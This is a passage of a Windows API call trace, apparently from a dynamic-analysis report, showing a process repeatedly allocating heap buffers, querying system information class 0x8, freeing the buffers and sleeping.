ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0299.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.223] Sleep (dwMilliseconds=0x110) [0299.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0299.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0299.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0299.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0299.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0299.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0299.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0299.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0299.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.236] Sleep (dwMilliseconds=0x110) [0299.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0299.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0299.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0299.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0299.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0299.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0299.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0299.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0299.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.254] Sleep (dwMilliseconds=0x110) [0299.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0299.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0299.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0299.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0299.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0299.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0299.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0299.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0299.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.270] Sleep (dwMilliseconds=0x110) [0299.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0299.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0299.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0299.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0299.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0299.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0299.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0299.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0299.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.284] Sleep (dwMilliseconds=0x110) [0299.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0299.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.294] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0299.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0299.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0299.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0299.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0299.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0299.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0299.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.299] Sleep (dwMilliseconds=0x110) [0299.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0299.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0299.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0299.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0299.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0299.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0299.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0299.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0299.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.316] Sleep (dwMilliseconds=0x110) [0299.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0299.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0299.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0299.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0299.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0299.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0299.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0299.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0299.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.332] Sleep (dwMilliseconds=0x110) [0299.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0299.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.341] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0299.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0299.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0299.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0299.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0299.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0299.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0299.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.347] Sleep (dwMilliseconds=0x110) [0299.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0299.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0299.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0299.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0299.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0299.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0299.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0299.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0299.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.364] Sleep (dwMilliseconds=0x110) [0299.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0299.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0299.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0299.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0299.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0299.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0299.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0299.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0299.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.380] Sleep (dwMilliseconds=0x110) [0299.417] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0299.417] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.418] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0299.418] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0299.418] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.418] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0299.418] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0299.420] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.420] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0299.420] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0299.420] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.421] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0299.421] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.421] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.421] Sleep (dwMilliseconds=0x110) [0299.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0299.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0299.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0299.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0299.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0299.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0299.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0299.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0299.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.442] Sleep (dwMilliseconds=0x110) [0299.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0299.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0299.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0299.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0299.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0299.458] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0299.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0299.458] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0299.459] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.460] Sleep (dwMilliseconds=0x110) [0299.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0299.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.466] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0299.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0299.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0299.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0299.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0299.468] RtlAllocateHeap 